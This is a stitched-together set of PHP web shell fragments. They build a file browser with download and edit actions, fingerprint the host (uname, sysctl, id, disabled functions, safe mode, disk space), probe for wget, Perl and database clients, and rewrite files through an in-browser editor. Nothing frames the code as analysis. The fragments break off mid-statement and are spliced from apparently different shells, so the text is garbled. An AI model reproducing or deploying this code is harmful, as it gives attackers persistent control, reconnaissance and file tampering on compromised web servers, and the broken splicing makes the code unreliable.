'<a/></td><td>dir</td><td></td><td>' . perms($link) . '</td></tr>'; } for ($i = 0; $i < count($files); $i++) { $linkfile = $dir . $files[$i]; echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();">' . $files[$i] . '</a><br></td><td>file</td><td>' . view_size(filesize($linkfile)) . '</td> <td>' . perms($linkfile) . '</td> <td> <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();" title="Download">D</a> <a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();" title="Edit">E</a></tr>'; } echo "</table>"; } } }
if ('' == ($df = @ini_get('disable_functions'))) { echo "<font color=green>NONE</font></b>"; } else { echo "<font color=red>{$df}</font></b>"; } $free = @diskfreespace($dir); if (!$free) { $free = 0; } $all = @disk_total_space($dir); if (!$all) { $all = 0; } $used = $all - $free; $used_percent = @round(100 / ($all / $free), 2); echo "<br>" . ws(2) . "HDD Free : <b>" . view_size($free) . "</b> HDD Total : <b>" . view_size($all) . "</b>"; echo '</font></td></tr><table> <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td align=right width=100>'; echo $font; if (!$windows) { echo '<font color=blue><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>'; echo "</td><td>"; echo "<font face=Verdana size=-2 color=red><b>"; $uname = ex('uname -a'); echo !empty($uname) ? ws(3) . @substr($uname, 0, 120) . "<br>" : ws(3) . @substr(@php_uname(), 0, 120) . "<br>"; if (!$safe_mode) { $bsd1 = ex('sysctl -n kern.ostype'); $bsd2 = ex('sysctl -n kern.osrelease'); $lin1 = ex('sysctl -n kernel.ostype'); $lin2 = ex('sysctl -n kernel.osrelease');
function getinfo() { $info = ''; $info .= '[~]Versione PHP: ' . phpversion() . '<br />'; $info .= '[~]Server: ' . $_SERVER['HTTP_HOST'] . '<br />'; $info .= '[~]Indirizzo IP: ' . $_SERVER['SERVER_ADDR'] . '<br />'; $info .= '[~]Software: ' . $_SERVER['SERVER_SOFTWARE'] . '<br />'; $info .= '[~]Charset: ' . $_SERVER['HTTP_ACCEPT_CHARSET'] . '<br />'; $info .= ini_get('safe_mode') == 0 ? '[~]Safe Mode: <font color="#00FF33">OFF</font><br />' : '[~]Safe Mode: <font color="#FF3300">OFF</font><br />'; $info .= ini_get('magic_quotes_gpc') == 0 ? '[~]Magic Quotes: <font color="#00FF33">OFF</font><br />' : '[~]Magic Quotes: <font color="#FF3300">ON</font><br />'; if (is_callable("disk_free_space")) { $d = realpath("."); $free = disk_free_space($d); $total = disk_total_space($d); if ($free === FALSE || $free < 0) { $free = 0; } if ($total === FALSE || $total < 0) { $total = 0; } $used = $total - $free; $info .= "[~]Free space: " . view_size($free) . "/" . view_size($total) . "<br />"; } return $info; }
echo "..." . substr($u, strlen($u) - 40, 40); } else { echo $u; } ?> </b></font></td> <td width="15%" >PostgreSQL: <?php echo postgresql(); ?> </td> <td width="15%" >WGet: <?php echo testwget(); ?> </td> <td width="25%" >Free space: <?php echo view_size(diskfreespace(getcwd())); ?> </td> </tr> <tr> <td width="35%" >User: <font size=2 color=#ff4500><b><?php echo getuser(); ?> </b></font></td> <td width="15%" >MSSQL: <?php echo testmssql(); ?> </td> <td width="15%" >Perl: <?php echo testperl(); ?>
exit("<html><head></head><body>\n<form action='" . basename($PHP_SELF) . "' name='frmmentalback' id='frmmentalback' method='post'>\n\n<input type='hidden' name='_lh' value='KSIAN.deh.GW'>\n\n</form><script type='text/javascript'>document.frmmentalback.submit();alert('Advanced Editor Disabled..!!!');</script></body></html>"); } } // === MAIN $buffer_TEXT = ''; if (!is_readable($fileconfig) or is_dir($fileconfig)) { if (file_exists($fileconfig)) { $buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($fileconfig) . ")!</b>"; } else { $buffer_TEXT .= "<b>File does not exists.</b>"; } } else { $styledisplay = ' style="display:none"'; $showpostn = false; $iserr = false; $t_head = "<b>File: " . CONFIG_FILE . " (" . view_size(filesize($fileconfig)); $t_head .= ") attrib: " . view_perms_color($fileconfig) . "</b>"; $t_head .= "<br>You're logged with IP: <b class='g'>" . get_real_ip() . "</b><br><hr width=\"800\">"; $buffer_TEXT .= $t_head; if (isset($_GET["mode"])) { if ($_GET["mode"] == "editor") { $buffer_TEXT .= "<p><b><span id='nv1' style='background-color:#840000;color:yellow;'> Editor </span></p>"; } } if (isset($_POST['submit'])) { if ($task == 'editor') { $edt = $_POST["edit_text"]; $fp = fopen($fileconfig, "w"); if (!$fp) { $buffer_TEXT .= "<b class='a'>Can't write to file!</b>"; } else {